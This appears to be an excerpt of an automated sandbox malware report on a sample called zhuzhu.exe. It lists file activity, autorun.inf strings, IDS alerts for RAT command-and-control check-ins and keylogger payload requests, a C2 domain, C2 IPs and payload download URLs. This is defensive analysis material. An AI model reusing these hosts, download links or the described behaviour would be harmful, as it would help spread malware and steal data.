                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: b:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: y:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: w:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: u:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: s:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: q:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: o:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: m:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: k:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: i:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: g:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: e:
                                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: [:
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                      Source: zhuzhu.exeBinary or memory string: [autorun]
                                      Source: zhuzhu.exeBinary or memory string: [autorun]
                                      Source: zhuzhu.exeBinary or memory string: autorun.inf
                                      Source: ~$cache1.2.drBinary or memory string: [autorun]
                                      Source: ~$cache1.2.drBinary or memory string: [autorun]
                                      Source: ~$cache1.2.drBinary or memory string: autorun.inf
                                      Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                                      Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                                      Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,7_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,7_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_001C3FB0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_5F52A6BA
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,12_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,12_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_001C3FB0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_037780F0
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\userJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppDataJump to behavior
                                      Source: excel.exeMemory has grown: Private usage: 2MB later: 68MB

                                      Networking

                                      barindex
                                      Suricata IDS alerts for network traffic
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49766 -> 118.107.44.219:19091
                                      Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49743 -> 69.42.215.252:80
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49785 -> 118.107.44.219:19091
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50264 -> 118.107.44.219:19091
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50265 -> 118.107.44.219:19092
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49738 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49744 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49756 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49759 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49750 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49764 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49746 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49782 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49754 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49776 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49794 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49787 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49770 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49772 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49778 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49786 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49739 -> 142.250.181.238:443
                                      C2 URLs / IPs found in malware configuration
                                      Source: Malware configuration extractorURLs: xred.mooo.com
                                      Connects to many ports of the same IP (likely port scanning)
                                      Source: global trafficTCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
                                      Uses dynamic DNS services
                                      Source: unknownDNS query: name: freedns.afraid.org
                                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 118.107.44.219:8853
                                      Source: global trafficUDP traffic: 192.168.2.4:28470 -> 1.192.136.170:3478
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: Joe Sandbox ViewIP Address: 180.163.251.230 180.163.251.230
                                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10001BB0 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,exit,1_2_10001BB0
                                      Source: global trafficHTTP traffic detected: GET /inst.exe HTTP/1.1User-Agent: URLDownloaderHost: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
